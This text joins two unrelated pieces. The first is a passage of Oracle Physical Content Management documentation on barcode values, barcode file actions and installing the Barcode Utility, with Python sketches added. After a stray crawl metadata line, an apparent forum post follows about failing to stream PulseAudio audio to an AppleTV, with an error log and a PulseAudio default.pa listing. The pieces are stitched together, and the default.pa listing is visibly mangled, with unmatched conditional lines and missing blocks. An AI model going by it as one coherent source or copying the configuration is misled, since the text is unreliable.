Any accented letters and double-byte characters (such as Japanese and Korean) are encoded in their hexadecimal values. For example, if a user login is 'kmüller', then its barcode value is 'KMC39CLLER' (Ü = hex C39C). Therefore the barcode length increases as multiple hexadecimal characters are used to represent each accented letter or double-byte character.
Barcode values for users default to their login names. This behavior can be changed for a user by setting a specific, unique barcode value for the user in the User Admin utility.
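The encoding rules above can be reproduced in a few lines of Python. The use of the upper-cased character's UTF-8 bytes is inferred from the Ü = hex C39C example in the text; treat this as a sketch rather than the product's exact algorithm:

```python
def barcode_value(login):
    """Compute a Code 39 barcode value for a user login.

    Lower-case letters are upper-cased first; any non-ASCII character
    is replaced by the upper-case hex of its UTF-8 bytes, so the barcode
    grows by several characters per accented or double-byte letter.
    """
    parts = []
    for ch in login.upper():
        if ch.isascii():
            parts.append(ch)
        else:
            parts.append(ch.encode("utf-8").hex().upper())
    return "".join(parts)

barcode_value("jsmith")   # -> "JSMITH"
barcode_value("kmüller")  # -> "KMC39CLLER"  (Ü = hex C39C)
```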
After scanning barcode information using a barcode reader, load the information into Physical Content Management. This can save time and money, and is especially useful to process large numbers of items (for example, during the initial Physical Content Management implementation).
There are two ways to load barcode information into Physical Content Management:
Directly using the PCM Barcode Utility software.
Manually, by processing generated barcode files (see "Processing a Barcode File").
Barcode files are generated by barcode scanners which read storage information from barcode labels and write this information to a file. Use the optional PCM Barcode Utility to directly load barcode information into the system or the barcode file can be processed manually.
Barcode files are plain-text files that are viewable using any text editor. Figure 7-2 shows an example of a barcode file.
Important: Barcode files are created by barcode scanners and processed by Physical Content Management, and there is normally no reason to view or modify barcode files.
When a barcode file is processed (automatically or manually), one of three actions are performed (specified for each item in the barcode file):
The Check In barcode action assigns an item to the location specified in the barcode file for the item. Only the item's current location is set, not its permanent location. The location must already exist in the defined storage space hierarchy in Physical Content Management; if it does not, an error is reported. If an item to be checked in does not yet exist in Physical Content Management, it is created and assigned to the specified location. If the item already exists, its current location is updated to match the value in the barcode file.
The Check Out barcode action checks an item out to the user specified in the barcode file for the item (typically obtained by scanning a user label). The status for the item is set to "Checked Out" and its checkout user to the specified user (both values are shown on the Physical Item Information page). The item's current location is automatically set to the value of the Deliver To Location field for the associated reservation request (if there is one). If no value was entered in that field or if no reservation request exists, the current location is set to "OTHER," and the Location Comment field will show the name of the checkout user.
The Set Location barcode action assigns an item to the current and permanent locations specified in the barcode file for that item, allowing it to be moved to a different location. Both the locations and the item must already exist in the defined storage space hierarchy in Physical Content Management; if any of them do not exist, an error is reported. The item's current and permanent locations are updated to match the values in the barcode file.
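Taken together, the three actions can be modeled with a small in-memory sketch. The record fields, location names, and create-on-check-in behavior follow the descriptions above; everything else (the data structures themselves) is illustrative:

```python
LOCATIONS = {"SHELF-01", "BOX-17", "OTHER"}   # assumed storage hierarchy
items = {}                                     # barcode -> item record

def check_in(barcode, location):
    """Set only the item's current location; create the item if it is new."""
    if location not in LOCATIONS:
        raise ValueError(f"unknown location: {location}")
    rec = items.setdefault(barcode, {"current": None, "permanent": None,
                                     "status": "Returned",
                                     "checkout_user": None})
    rec.update(current=location, status="Returned", checkout_user=None)

def check_out(barcode, user, deliver_to=None):
    """Check the item out; current location falls back to OTHER."""
    rec = items[barcode]                       # item must already exist
    rec.update(status="Checked Out", checkout_user=user,
               current=deliver_to or "OTHER")

def set_location(barcode, current, permanent):
    """Move an existing item: update both current and permanent locations."""
    if not {current, permanent} <= LOCATIONS:
        raise ValueError("unknown location")
    rec = items[barcode]                       # item must already exist
    rec.update(current=current, permanent=permanent)

check_in("BC0001", "SHELF-01")
check_out("BC0001", "JSMITH")                  # no deliver-to -> "OTHER"
set_location("BC0001", "BOX-17", "BOX-17")
```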
The Barcode Utility software is a Windows application providing an interface to the Videx LaserLite barcode scanner used with Physical Content Management. With this functionality, information can be read into the barcode scanner and uploaded into PCM. The barcode information can also be read and written to a file for manual processing at a later time. In addition, the Barcode Utility enables the reprogramming of the barcode scanner, should that be necessary.
The Barcode Utility software for Videx is provided but not automatically installed with the PCM software. To use it, install the software after enabling PCM. The installer for the Barcode Utility is included on the PCM software distribution media.
Microsoft .NET Framework Version 1.1 Redistributable Package is needed to run the Barcode Utility. If not already on the computer, it can be downloaded from the Microsoft website at
The Barcode Utility can be installed on any computer that has a web connection to the server.
Important: If you upgrade the Barcode Utility from an earlier version, you must uninstall the existing instance before installing the new release. If you do not, an error message is reported during the installation and you will not be able to proceed.
To install the Barcode Utility, complete the following steps:
Locate the executable installer file, named BarcodeUtility.exe on the Physical Content Management distribution media. This is typically stored in the ucm\Distribution\urm\language directory (different files are included for the different languages that are supported).
Double-click the setup.exe file to continue the installation.
Follow the instructions on screen to install the software.
From Start, select Programs, then select Oracle, then select Barcode Utility, then select Barcode Utility. You can also double-click the utility icon on the Windows desktop.
An interface is also provided for a Wedge Reader type of scanner, which plugs directly into the computer. If that type of scanner is enabled, data is automatically entered at the location on the screen where the cursor rests after three scans have taken place.
This section discusses the following common barcode tasks:
"Programming the Barcode Scanner"
"Uploading Barcode Data Directly to PCM"
"Saving Barcode Data to a File"
"Uploading Previously Saved Barcode Data to PCM"
"Processing a Barcode File"
For details about enabling a mobile bar code scanner, see the Oracle Fusion Middleware Setup Guide for Universal Records Management.
The Videx Wand scanner may be pre-programmed for use at installation. Use the following procedure, if needed, to program the barcode scanner:
Start the Barcode Utility application.
The Main Barcode Utility Screen is displayed.
Click Options then Program Videx Wand.
The Program Videx Barcode Wand Screen is displayed.
Choose the type of scanner to be programmed from the Communication Device list.
Choose the communication port where the device is connected.
Click Program.
A message appears, indicating that the application is communicating with the scanner. The dialog closes when the programming finishes.
Click Done on the Main Barcode Utility Screen.
Push the Scan button on the scanner.
After gathering data with the scanner, the data can be directly uploaded to the server running the PCM software. The data can also be saved to a file and uploaded later.
Complete the following steps to upload the scanned barcode data directly to PCM:
Make sure that the Download To File Only and Allow File Selection boxes are both cleared.
Click the Process button.
A prompt appears to begin the upload process.
Select Yes to continue.
Select the host name of the instance where data files will be uploaded. The software must be installed on this computer. Click OK after selecting the user name.
The data is now transferred from the scanner to the PCM system. After all data has been transferred, a message is displayed, indicating the operation is complete.
Click OK to continue.
Important: If you select No when asked to confirm the upload, the data is erased from the barcode scanner and nothing is uploaded. The data is still available in a file called DATA.TXT (located in the installation directory of the Barcode Utility), but this file is overwritten the next time data is uploaded or saved to a file.
Complete the following steps to save the scanned barcode data to a file:
Make sure that the Download To File Only box is selected.
Click the Process button.
The data is stored in a file called DATA.TXT, which is located in the installation directory of the Barcode Utility. See "Uploading Previously Saved Barcode Data to PCM" for details about uploading this data file at a later time.
Note: Data is always stored in a file named DATA.TXT. If not renamed, the file is overwritten the next time data is downloaded and stored as a file.
If barcode data was saved to a file for later processing (see "Saving Barcode Data to a File"), use the Barcode Utility application to move the data to the PCM software for use.
Complete the following steps to upload a previously saved barcode data file:
Start the Barcode Utility application.
The Main Barcode Utility Screen is displayed.
Make sure the Allow File Selection box is selected and click the Process button.
A file selection dialog is displayed, showing the contents of the Barcode Utility installation directory (which is the default location of saved barcode data files).
Select the file to be uploaded, or navigate to the directory where the data files were stored and select a file from that location. Click Open.
The Barcode Upload Screen is displayed.
Select the host name of the instance where the data file will be uploaded. The software must be installed on this computer.
If you need to, select a different user name. Click Submit.
The barcode data file is processed and uploaded to the selected instance.
After the file upload has completed, a message is displayed. Click OK.
The Barcode Upload Results Screen is displayed, allowing a review of the results of the upload.
Click Done when finished.
Permissions: The PCM.Barcode.Process right is required to perform this action. This right is assigned by default to the PCM Administrator role.
Use this procedure to process a barcode file containing information obtained using a barcode scanner.
Click Physical then Process Barcode File from the Top menu.
The Barcode Processing Page is displayed.
Click the Browse button to select a barcode file to be processed.
A file selection dialog is opened.
Navigate to the barcode file to be processed, select it, and close the file selection dialog.
Click Process File.
The barcode file is processed, and the Barcode File Processed Page is displayed. If any errors occurred, these are reported in the Message column. Click the Info icon to see more specific information about the error message.
When finished viewing the results of the barcode processing, click OK to return to the Barcode Processing Page. | http://docs.oracle.com/cd/E14571_01/doc.1111/e10789/c07_reservations.htm | CC-MAIN-2015-22 | refinedweb | 3,759 | 54.32 |
repackage 0.5
Repackaging: call a non-registered package in any directory (with a relative call). Used either by modules moved into a subdirectory or to prepare the import of a non-registered package (in any relative path).
Laurent Franceschetti March/June 2013 - 2017 MIT License.
Purpose
This module allows any Python program to call a non-registered package in a reliable way. With this module, you may call “non-official” repositories, including with relative paths.
CAUTION: This form is an alternative to the system of relative paths for Python imports (PEP 328) and as such it is largely redundant. It can, however, be interesting because it shows how such a problem could be solved.
Install
If you are using pip:
pip install repackage
The problem
In Python, registered packages are called by name in import instructions, and lower directories may be treated for all purposes as packages.
Two practical problems arise: a) How to easily call unregistered packages which have been dumped in an adjacent directory? b) How to easily move python files into a sub-directory without messing up the import statements?
There are complicated issues with relative imports (see PEP366). The basic idea here is to add the source directory of the package to the lib path (thanks to a call to sys.path.append).
But the problem is how to programmatically find the source directory from a relative path.
Two often advocated methods to determine the path are: (a) from the current directory, or (b) from `__file__`.

Both those methods have a flaw:

- The first does not take into account the file where the import is made, hence it will fail if the project uses more than one directory.
- The second does not allow delegating those operations to a module that would handle those issues (as `__file__` would then point to the module and not the caller).
The solution
This package uses a simple strategy that is likely to work in a good range of cases: it inspects the stack to determine which file is the caller and works out the relative path from there. The only delicate part consisted in working out how many steps down the stack this is, but the answer should be invariant and can be computed both by reasoning and by trial and error (in this case: 3).
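As an illustration of that strategy (not the library's actual source — the helper name is mine, and the real repackage works out the stack depth differently), a minimal version might look like this:

```python
import inspect
import os
import sys

def add_relative(path="..", depth=1):
    """Append a directory, given relative to the *caller's* file, to sys.path.

    inspect.stack()[depth] is the frame of whoever called us, so the
    relative path is resolved against that file rather than against the
    current working directory or this module's own __file__.
    """
    caller_file = inspect.stack()[depth].filename
    base = os.path.dirname(os.path.abspath(caller_file))
    target = os.path.abspath(os.path.join(base, path))
    if target not in sys.path:  # appending twice would be harmless but noisy
        sys.path.append(target)
    return target
```

Calling `add_relative("..")` from a module buried one level deep would then make imports that expect the parent directory resolvable again.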
Usage
Situation 1) Moving the files into a lower directory. From the module you want to make the call, just use the following statement before the imports:
import repackage
repackage.up()
It should work without changing the imports that were previously pointing to the upper directory.
If it’s two directories up, write:
import repackage
repackage.up(2)
Situation 2) Calling a non-registered directory somewhere else (absolute or relative path):
import repackage
repackage.add("../../otherdir")
Clearly, repackage.up() would be equivalent to repackage.add(".."). I prefer the first because it is more terse and syntactically more robust.
Limitations
If at some points in the execution, you attempt to add several times the same directory to the lib path, this should remain without effect (this is a feature of sys.path.append).
This module has worked reliably for a while, so it is a beta version. The method seems robust so far, but not all ins and outs have been explored. One precaution might be to ensure that the repackaging always points to the same source directory of a package (not to subdirectories of the same package), so as to avoid possible ambiguities in the lib path. (If this really turned out to be a problem, this could be checked on the fly and a warning issued?).
If you find bugs, or even find this approach useless, essentially flawed or against the Zen of Python, I will be glad to hear about it. Similarly, if you liked it or have ideas on how to improve it, let me know.
- Author: Laurent Franceschetti
- Keywords: package relative path module import library
- License: MIT
- Package Index Owner: galileo
- DOAP record: repackage-0.5.xml | https://pypi.python.org/pypi/repackage | CC-MAIN-2017-39 | refinedweb | 672 | 61.16 |
On Sat, Mar 24, 2018 at 2:00 AM, Steven D'Aprano steve@pearwood.info wrote:
On Fri, Mar 23, 2018 at 09:01:01PM +1100, Chris Angelico wrote:
PEP: 572
Title: Syntax for Statement-Local Name Bindings
[...]
Abstract
Programming is all about reusing code rather than duplicating it.
I don't think that editorial comment belongs here, or at least, it is way too strong. I'm pretty sure that programming is not ALL about reusing code, and code duplication is not always wrong.
Rather, we can say that *often* we want to avoid code duplication, and this proposal is way way to do so. And this should go into the Rationale, not the Abstract. The abstract should describe what this proposal *does*, not why, for example:
This is a proposal for permitting temporary name bindings which are limited to a single statement.
What the proposal *is* goes in the Abstract; reasons *why* we want it go in the Rationale.
Thanks. I've never really been happy with my "Abstract" / "Rationale" split, as they're two sections both designed to give that initial 'sell', and I'm clearly not good at writing the distinction :)
Unless you object, I'm just going to steal your Abstract wholesale. Seems like some good words there.
I see you haven't mentioned anything about Nick Coglan's (long ago) concept of a "where" block. If memory serves, it would be something like:
value = x**2 + 2*x where:
    x = some expression
These are not necessarily competing, but they are relevant.
Definitely relevant, thanks. This is exactly what I'm looking for - related proposals that got lost in the lengthy threads on the subject. I'll mention it as another proposal, but if anyone has an actual post for me to reference, that would be appreciated (just to make sure I'm correctly representing it).
Nor have you done a review of any other languages, to see what similar features they already offer. Not even the C's form of "assignment as an expression" -- you should refer to that, and explain why this would not similarly be a bug magnet.
No, I haven't yet. Sounds like a new section is needed. Thing is, there's a HUGE family of C-like and C-inspired languages that allow assignment expressions, and for the rest, I don't have any personal experience. So I need input from people: what languages do you know of that have small-scope name bindings like this?
Rationale
When a subexpression is used multiple times in a list comprehension,
I think that list comps are merely a single concrete example of a more general concept that we sometimes want or need to apply the DRY principle to a single expression.
This is (usually) a violation of DRY whether it is inside or outside of a list comp:
result = (func(x), func(x)+1, func(x)*2)
True, but outside of comprehensions, the most obvious response is "just add another assignment statement". You can't do that in a list comp (or equivalently in a genexp or dict comp). Syntactically you're right that they're just one example of a general concept; but they're one of the original motivating reasons. I've tweaked the rationale wording some; the idea is now "here's a general idea" followed by two paragraphs of specific use-cases (comprehensions and loops). Let me know if that works better.
Syntax and semantics
In any context where arbitrary Python expressions can be used, a **named expression** can appear. This must be parenthesized for clarity, and is of the form ``(expr as NAME)`` where ``expr`` is any valid Python expression, and ``NAME`` is a simple name.
The value of such a named expression is the same as the incorporated expression, with the additional side-effect that NAME is bound to that value for the remainder of the current statement.
Examples should go with the description. Such as:
x = None if (spam().ham as eggs) is None else eggs
Not sure what you gain out of that :) Maybe a different first expression would help.
y = ((spam() as eggs), (eggs.method() as cheese), cheese[eggs])
Sure. I may need to get some simpler examples to kick things off though. is the same as nested functions (including comprehensions, since they're implemented with functions); and if SLNBs are *not* to shadow each other, the only way is to straight-up disallow it. For the moment, I'm not forbidding it, as there's no particular advantage to popping a SyntaxError.
Assignment to statement-local names is ONLY through this syntax. Regular assignment to the same name will remove the statement-local name and affect the name in the surrounding scope (function, class, or module).
That seems unnecessary. Since the scope only applies to a single statement, not a block, there can be no other assignment to that name.
Correction: I see further in that this isn't the case. But that's deeply confusing, to have the same name refer to two (or more!) scopes in the same block. I think that's going to lead to some really confusing scoping problems.
For the current proposal, I prefer simpler definitions to outlawing the odd options. The rule is: An SLNB exists from the moment it's created to the end of that statement. Very simple, very straight-forward. Yes, that means you could use the same name earlier in the statement, but ideally, you just wouldn't do that.
Python already has weirder behaviour in it.
>>> def f():
...     e = 2.71828
...     try:
...         1/0
...     except Exception as e:
...         print(e)
...     print(e)
...
>>> f()
division by zero
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<stdin>", line 7, in f
UnboundLocalError: local variable 'e' referenced before assignment
Does this often cause problems? No, because most functions don't use the same name in two different ways. An SLNB should be basically the same.
Statement-local names never appear in locals() or globals(), and cannot be closed over by nested functions.
Why can they not be used in closures? I expect that's going to cause a lot of frustration.
Conceptually, the variable stops existing at the end of that statement. It makes for some oddities, but fewer oddities than every other variant that I toyed with. For example, does this create one single temporary or many different temporaries?
def f():
    x = "outer"
    funcs = {}
    for i in range(10):
        if (g(i) as x) > 0:
            def closure():
                return x
            funcs[x] = closure
Obviously the 'x' in funcs[x] is the current version of x as it runs through the loop. But what about the one closed over? If regular assignment is used ("x = g(i)"), the last value of x will be seen by every function. With a statement-local variable, should it be a single temporary all through the loop, or should each iteration create a brand new "slot" that gets closed over? If the latter, why is it different from regular assignment, and how would it be implemented anyway? Do we now need an infinite number of closure cells that all have the exact same name?
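The regular-assignment behaviour referred to here ("the last value of x will be seen by every function") is easy to demonstrate in today's Python:

```python
def make_funcs():
    funcs = []
    for i in range(3):
        x = i * 10               # one ordinary local 'x', rebound each iteration
        funcs.append(lambda: x)  # every lambda closes over that same 'x'
    return funcs

# All three closures share one cell, so they all see the final value:
print([f() for f in make_funcs()])  # -> [20, 20, 20]
```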
Execution order and its consequences
Since the statement-local name binding lasts from its point of execution to the end of the current statement, this can potentially cause confusion when the actual order of execution does not match the programmer's expectations. Some examples::
# A simple statement ends at the newline or semicolon.
a = (1 as y)
print(y)  # NameError
That error surprises me. Every other use of "as" binds to the current local namespace. (Or global, if you use the global declaration first.)
I think there's going to be a lot of confusion about which uses of "as" bind to a new local and which don't.
That's the exact point of "statement-local" though.
I think this proposal is conflating two unrelated concepts:
- introducing new variables in order to meet DRY requirements;
- introducing a new scope.
Why can't we do the first without the second?
a = (1 as y)
print(y)  # prints 1, as other uses of "as" would do
That would avoid the unnecessary (IMO) restriction that these variables cannot be used in closures.
You're talking about one of the alternate proposals there. (#6, currently.) I have talked about the possibility of splitting this into two separate proposals, but then I'd have to try to chair two separate concurrent discussions that would constantly interact and cross over :)
# The assignment ignores the SLNB - this adds one to 'a'
a = (a + 1 as a)
"SLNB"? Undefined acronym. What is it? I presume it has something to do with the single-statement variable.
Statement-Local Name Binding, from the title of the PEP. (But people probably don't read titles.)
I know it would be legal, but why would you write something like that? Surely your examples must at least have a pretence of being useful (even if the examples are only toy examples rather than realistic).
That section is about the edge cases, and one such edge case is assigning through an SLNB.
I think that having "a" be both local and single-statement in the same expression is an awful idea. Lua has the (mis-)features that variables are global by default, locals need to be declared, and the same variable name can refer to both local and global simultaneously. Thus we have:
print(x)         # prints the global x
local x = x + 1  # sets local x to the global x plus 1
print(x)         # prints the local x
IMO that's a *good* thing. JavaScript works the other way; either you say "var x = x + 1;" and the variable exists for the whole function, pre-initialized to the special value 'undefined', or you say "let x = x + 1;" and the variable is in limbo until you hit that statement, causing a ReferenceError (JS's version of NameError). Neither makes as much sense as evaluating the initializer before the variable starts to exist.
That said, though, this is STILL an edge case. It's giving a somewhat-sane meaning to something you normally won't do.
This idea of local + single-statement names in the same expression strikes me as similar. Having that same sort of thing happening within a single statement gives me a headache:
spam = (spam, ((spam + spam as spam) + spam as spam), spam)
Explain that, if you will.
Sure. First, eliminate all the name bindings:
spam = (spam, ((spam + spam) + spam), spam)
Okay. Now anyone with basic understanding of algebra can figure out the execution order. Then every time you have a construct with an 'as', you change the value of 'spam' from that point on.
Which means we have:
spam0 = (spam0, ((spam0 + spam0 as spam1) + spam1 as spam2), spam2)
Execution order is strictly left-to-right here, so it's pretty straight-forward. Less clear if you have an if/else expression (since they're executed middle-out instead of left-to-right), but SLNBs are just like any other side effects in an expression, performed in a well-defined order. And just like with side effects, you don't want to have complex interactions between them, but there's nothing illegal in it.
# Compound statements usually enclose everything...
if (re.match(...) as m):
    print(m.groups(0))
print(m)  # NameError
Ah, how surprising -- given the tone of this PEP, I honestly thought that it only applied to a single statement, not compound statements.
You should mention this much earlier.
Hmm. It's right up in the Rationale section, but without an example. Maybe an example would make it clearer?
# ... except when function bodies are involved...
if (input("> ") as cmd):
    def run_cmd():
        print("Running command", cmd)  # NameError
Such a special case is a violation of the Principle of Least Surprise.
Blame classes, which already do this. Exactly this. Being able to close over temporaries creates its own problems.
# ... but function *headers* are executed immediately
if (input("> ") as cmd):
    def run_cmd(cmd=cmd):  # Capture the value in the default arg
        print("Running command", cmd)  # Works
Function bodies, in this respect, behave the same way they do in class scope; assigned names are not closed over by method definitions. Defining a function inside a loop already has potentially-confusing consequences, and SLNBs do not materially worsen the existing situation.
Except by adding more complications to make it even harder to understand the scoping rules.
Except that I'm adding no complications. This is just the consequences of Python's *existing* scoping rules.
Differences from regular assignment statements
Using ``(EXPR as NAME)`` is similar to ``NAME = EXPR``, but has a number of important distinctions.
- Assignment is a statement; an SLNB is an expression whose value is the same as the object bound to the new name.
- SLNBs disappear at the end of their enclosing statement, at which point the name again refers to whatever it previously would have. SLNBs can thus shadow other names without conflict (although deliberately doing so will often be a sign of bad code).
Why choose this design over binding to a local variable? What benefit is there to using yet another scope?
Mainly, I just know that there has been a lot of backlash against a generic "assignment as expression" syntax in the past.
- SLNBs do not appear in ``locals()`` or ``globals()``.
That is like non-locals, so I suppose that's not unprecedented.
Will there be a function slnbs() to retrieve these?
Not in the current proposal, no. Originally, I planned for them to appear in locals() while they were in scope, but that created its own problems; I'd be happy to return to that proposal if it were worthwhile.
- An SLNB cannot be the target of any form of assignment, including augmented. Attempting to do so will remove the SLNB and assign to the fully-scoped name.
What's the justification for this limitation?
Not having that limitation creates worse problems, like that having "(1 as a)" somewhere can suddenly make an assignment fail. This is particularly notable with loop headers rather than simple statements.
Example usage
These list comprehensions are all approximately equivalent::
[...]
I don't think you need to give an exhaustive list of every way to write a list comp. List comps are only a single use-case for this feature.
# See, for instance, Lib/pydoc.py
if (re.search(pat, text) as match):
    print("Found:", match.group(0))
I do not believe that is actually code found in Lib/pydoc.py, since that will be a syntax error. What are you trying to say here?
Lib/pydoc.py has a more complicated version of the exact same functionality. This would be a simplification of a common idiom that can be found in the stdlib and elsewhere.
while (sock.read() as data):
    print("Received data:", data)
Looking at that example, I wonder why we need to include the parens when there is no ambiguity.
# okay
while sock.read() as data:
    print("Received data:", data)
# needs parentheses
while (spam.method() as eggs) is None or eggs.count() < 100:
    print("something")
I agree, but starting with them mandatory allows for future relaxation of requirements. The changes to the grammar are less intrusive if the parens are always required (for instance, the special case "f(x for x in y)" has its own entry in the grammar).
Performance costs
The cost of SLNBs must be kept to a minimum, particularly when they are not used; the normal case MUST NOT be measurably penalized.
What is the "normal case"?
The case where you're not using any SLNBs.
It takes time, even if only a nanosecond, to bind a value to a name, as opposed to *not* binding it to a name.
x = (spam as eggs)
has to be more expensive than
x = spam
because the first performs two name bindings rather than one. So "MUST NOT" already implies this proposal *must* be rejected. Perhaps you mean that there SHOULD NOT be a SIGNIFICANT performance penalty.
The mere fact that this feature exists in the language MUST NOT measurably impact Python run-time performance.
SLNBs are expected to be uncommon,
On what basis do you expect this?
Me, I'm cynical about my fellow coders, because I've worked with them and read their code *wink* and I expect they'll use this everywhere "just in case" and "to avoid namespace pollution".
Compared to regular name bindings? Just look at the number of ways to assign that are NOT statement-local, and then add in the fact that SLNBs aren't going to be effective for anything that you need to mutate more than once, and I fully expect that regular name bindings will far exceed SLNBs.
Besides, I think that the while loop example is a really nice one. I'd use that, I think. I *almost* think that it alone justifies the exercise.
Hmm, okay. I'll work on rewording that section later.
Forbidden special cases
In two situations, the use of SLNBs makes no sense, and could be confusing due to the ``as`` keyword already having a different meaning in the same context.
I'm pretty sure there are many more than just two situations where the use of this makes no sense. Many of your examples perform an unnecessary name binding that is then never used. I think that's going to encourage programmers to do the same, especially when they read this PEP and think your examples are "Best Practice".
Unnecessary, yes, but not downright problematic. The two specific cases mentioned are (a) evaluating expressions, and (b) using the 'as' keyword in a way that's incompatible with PEP 572. (There's no confusion in "import x as y", for instance, because "x" is not an expression.)
Besides, in principle they could be useful (at least in contrived examples). Remember that exceptions are not necessarily constants. They can be computed at runtime:
try:
    ...
except (Errors[key], spam(Errors[key])):
    ...
Sure they *can*. Have you ever seen something like that in production? I've seen simple examples (eg having a tuple of exception types that you care about, and that tuple not always being constant), but nothing where you could ever want an SLNB.
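For what it's worth, the dynamic part of that (minus the proposed `as` binding) is already valid Python today:

```python
# Exception specifications are ordinary expressions, evaluated when the
# except clause is reached -- they don't have to be compile-time constants.
Errors = {"io": (OSError, ValueError)}
key = "io"

try:
    raise ValueError("boom")
except Errors[key] as exc:
    caught = type(exc).__name__

print(caught)  # -> ValueError
```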
Since we have a DRY-violation in Errors[key] twice, it is conceivable that we could write:
try:
    ...
except ((Errors[key] as my_error), spam(my_error)):
    ...
Contrived? Sure. But I think it makes sense.
Perhaps a better argument is that it may be ambiguous with existing syntax, in which case the ambiguous cases should be banned.
It's not *technically* ambiguous, because PEP 572 demands parentheses and both 'except' and 'with' statements forbid parentheses. The compiler can, with 100% accuracy, pick between the two alternatives. But having "except X as Y:" mean something drastically different from "except (X as Y):" is confusing *to humans*.
- ``with NAME = EXPR``::
stuff = [(y, x/y) with y = f(x) for x in range(5)]
This is the same proposal as above, just using a different keyword.
Yep. I've changed the heading to "Alternative proposals and variants" as some of them are merely variations on each other. They're given separate entries because I have separate commentary about them.
- Allowing ``(EXPR as NAME)`` to assign to any form of name.
And this would be a second proposal.
This is exactly the same as the promoted proposal, save that the name is bound in the same scope that it would otherwise have. Any expression can assign to any name, just as it would if the ``=`` operator had been used. Such variables would leak out of the statement into the enclosing function, subject to the regular behaviour of comprehensions (since they implicitly create a nested function, the name binding would be restricted to the comprehension itself, just as with the names bound by ``for`` loops).
Indeed. Why are you rejecting this in favour of combining name-binding + new scope into a single syntax?
Mainly because there's been a lot of backlash against regular assignment inside expressions. One thing I *have* learned from life is that you can't make everyone happy. Sometimes, "why isn't your proposal X instead of Y" is just "well, X is a valid proposal too, so you can go ahead and push for that one if you like". :) I had to pick something, and I picked that one.
ChrisA | https://mail.python.org/archives/list/python-ideas@python.org/message/RC4KX34OTTBWWK45YALB2EIKPWCXSPRU/ | CC-MAIN-2021-21 | refinedweb | 3,410 | 63.59 |
BLUF: Issue is solved, if not resolved. The last poster notes that PulseAudio's RAOP support only handles TCP connections, while the AppleTV does its magic over UDP. There appear to be solutions in the works, but for now I'm not going to attempt an implementation in order to spend my time on other things. Thanks for the help and input.
----Original post----
I'm attempting to transmit sound from my laptop to my AppleTV so that I can output it through my sound system in the living room. I understand that this is doable with PulseAudio and Avahi for discovery, but I have not been able to get it to work.
My setup is as follows:
Computer: Late 2010 MacBook Air
AppleTV (works fine when I boot to Mac or use my girlfriend's Mac to stream)
I'm using XFCE as my primary window manager and have Clementine and Banshee installed (not sure which I prefer). I've also got Gnome installed (also testing the water on two fronts).
I've read through the PulseAudio, Sound wiki entries and have not found a solution.
Local audio works just fine, so I believe that I have my local audio configuration set up correctly. I've run paprefs and checked the two network access boxes. After restarting PulseAudio with "pulseaudio -k", I'm able to see the AppleTV as an output device in pavucontrol.
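If anyone wants to script the same check instead of clicking through pavucontrol, here's a rough sketch (the helper name is mine; it assumes RAOP sinks show up with "raop" in the sink name, which is how module-raop-discover typically names them, e.g. raop_output.Apple-TV.local):

```python
import shutil
import subprocess

def list_raop_sinks():
    """Return names of PulseAudio sinks that look like AirPlay/RAOP outputs.

    Shells out to `pactl list short sinks`; returns [] when pactl is not
    installed or the daemon isn't running, so it is safe to call anywhere.
    """
    if shutil.which("pactl") is None:
        return []
    result = subprocess.run(["pactl", "list", "short", "sinks"],
                            capture_output=True, text=True, check=False)
    sinks = []
    for line in result.stdout.splitlines():
        fields = line.split("\t")
        if len(fields) > 1 and "raop" in fields[1]:
            sinks.append(fields[1])
    return sinks
```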
When I open Clementine for audio and then open the PulseAudio Volume Control, I can select the output sink for that program individually and set it to AppleTV, but I get no sound and Clementine stops playing. When I say it stops playing, I mean that not only does the sound stop, but the equalizer visualization at the bottom of the screen stops moving as well, which indicates to me that the audio system knows that it is not successfully connected to the AppleTV and that no sound is being pushed.
When I open Banshee I get a similar behavior, but I don't have the fancy visualization to tell if sound is being pushed but not received.
There is clearly a problem with the RTSP system, as the output from the pulseaudio command includes the following:
E: [pulseaudio] rtsp_client.c: Assertion 'c->url' failed at modules/rtp/rtsp_client.c:404, function rtsp_exec(). Aborting.
I'm not sure if that means that I'm missing something, have something misconfigured, or have found a genuine bug (I know, least likely case).
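One sanity check that can be scripted (a sketch — the function name is mine, and port 5000 is an assumption, being the classic RAOP/RTSP control port) is whether the receiver even accepts a TCP connection. Note that a receiver can pass this check and still expect its audio over UDP, which is exactly the TCP-vs-UDP mismatch mentioned in the BLUF at the top:

```python
import socket

def raop_rtsp_reachable(host, port=5000, timeout=2.0):
    """Return True if a TCP connection to the receiver's RTSP port succeeds.

    Port 5000 is the classic RAOP/AirTunes control port (an assumption;
    the real port is advertised over mDNS as a _raop._tcp service).
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Hypothetical AppleTV address on the LAN:
# raop_rtsp_reachable("192.168.1.50")
```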
My /etc/pulse/default.pa file reads like this:
#!/usr/bin/pulseaudio -nF
#
# startup script is used only if PulseAudio is started per-user
# (i.e. not in system mode)

### Automatically restore the volume of streams and devices
load-module module-device-restore
load-module module-stream-restore
load-module module-card-restore

### Automatically augment property information from .desktop files
### stored in /usr/share/application
load-module module-augment-properties

### Load audio drivers statically
### (it's probably better to not load these drivers manually, but instead
### use module-udev
### Use the static hardware detection module (for systems that lack udev support)
load-module module-detect
.endif

### Automatically connect sink and source if JACK server is present
.ifexists module-jackdbus-detect.so
.nofail
load-module module-jackdbus-detect
.fail
.endif

### Automatically load driver modules for Bluetooth hardware
.ifexists module-bluetooth-policy.so
load-module module-bluetooth-policy
.endif
.ifexists module-bluetooth-discover.so
load-module module-bluetooth-discover
.endif

### Load several protocols
.ifexists module-esound-protocol-unix.so
load-module module-esound-protocol-unix
.endif
load-module module-native-protocol-unix

### Network access (may be configured with paprefs, so leave this commented
### here if you plan to use paprefs)
#load-module module-esound-protocol-tcp
load-module module-native-protocol-tcp
#load-module module-zeroconf-publish

### Load the RTP receiver module (also configured via paprefs, see above)
#load-module module-rtp-recv

### Load the RTP sender module (also configured via paprefs, see above)
#load-module module-null-sink sink_name=rtp format=s16be channels=2 rate=44100 sink_properties="device.description='RTP Multicast Sink'"
#load-module module-rtp-send source=rtp.monitor

### Load additional modules from GConf settings. This can be configured with the paprefs tool.
### Please keep in mind that the modules configured by paprefs might conflict with manually
### loaded modules.
.ifexists module-gconf.so
.nofail
load-module module-gconf
.fail
.endif

### Automatically restore the default sink/source when changed by the user
### during runtime
### NOTE: This should be loaded as early as possible so that subsequent modules
### that look up the default sink/source get the right value
load-module module-default-device-restore

### Automatically move streams to the default sink if the sink they are
### connected to dies, similar for sources
load-module module-rescue-streams

